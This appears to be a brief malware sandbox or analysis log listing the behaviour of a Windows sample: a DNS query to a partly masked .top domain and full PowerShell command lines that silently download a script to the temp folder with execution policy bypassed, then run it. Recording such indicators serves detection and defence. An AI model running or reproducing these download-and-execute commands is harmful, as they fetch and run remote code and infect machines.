Technical Information
- http://fo####udecpa.top/dl.php as %temp%\ghcrgsjjdx6hh.ps1
- DNS ASK fo####udecpa.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -ExecutionPolicy Bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://fo####udecpa.top/dl.php','%TEMP%\GhcRgsjjdx6Hh.ps1'); powershell.exe -WindowStyle h...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -ExecutionPolicy Bypass -noprofile -file %TEMP%\GhcRgsjjdx6Hh.ps1